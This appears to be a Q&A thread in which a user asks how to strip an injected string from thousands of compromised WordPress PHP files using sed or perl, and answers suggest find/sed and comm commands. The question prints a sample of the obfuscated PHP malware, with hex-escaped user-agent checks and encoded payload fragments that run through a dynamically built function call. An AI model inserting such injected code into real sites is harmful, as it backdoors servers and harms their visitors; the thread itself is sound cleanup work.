# Replacing large string of text in Linux

Tags: linux, bash, sed

I have several 1000 WP files that were injected with string such as the following:

I know I can do a replace with something like this:

```
find . -type f -exec sed -i 's/foo/bar/g' {} +
```

But I am having a problem getting the large string to be taken correctly. All the " and ' cause the string to jump out of my CLI.

Below is a sample string:

```
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\1162]y4c##j0#67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1pde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5cujojRk3%x5c%x7860{666~7878Bsfuvso!sboepn)%x5c%x7825epnbss-x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)p5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%xp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uc%x7825Z<#opo#>b%x5c%x7<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x70QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x!Ydrr)%x5c%x7825r%x5c%x%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5cq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!s%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x560msvd}+;!>!}%x5c%x7827;!>tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f2e:4e, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>
```

EXAMPLE of what I tried:

```
perl -pi -e 's/<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $rlapmcvfunction fjfgg($n){%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782c%x7824*!|!%x5c%x7824-...x2a\57\x20"; $qenzappyva=substr($rlapmcvoxs,(48535-38422),(59-47)); $qenzappyva($rrzeotjace, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>//g' /home/......../content-grid.php
-bash: !: event not found
```

Comment: are there similar lines that need to be preserved, or can you throw away all the lines starting with, let's say `<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])`?

Comment: "to jump out of my CLI" what do you mean?

Comment: @MichaelJaros They can be thrown away.

Comment: It's a shame you don't have a backup of the files before they ended up with all this junk in them :)

Comment: In any case, if you have problems parsing a single quote with sed, remember, for each single quote ```'``` you want to scan write ```'\''```, three single quotes and the second backslah-ed. Double quote on the other hand should work fine within the regex of sed.

Comment: See http://stackoverflow.com/a/29626460/1745001 for how to escape all chars that sed might not take literally.

Answer (score 1, accepted):

If the match is identical and on a separate line you can use `comm`

```
comm -23 source subtract
```

where subtract is the file with the contents to be removed from the source file.  It's not an in place replacement so you have to create a temp file and overwrite the source after making sure it does what you need.

Comment: `comm` relies on the files being sorted. It would not work for this case.

Answer (score 0):

If you don't care about the extra newline, the simple approach using `sed` would be:

```
find . -type f -exec sed -i 's/.*\\x61\\156\\x75\\156\\x61.*$//g' {} +
```

`sed` can also handle the newline, but [that is a little more complex](https://unix.stackexchange.com/questions/114943/can-sed-replace-new-line-characters).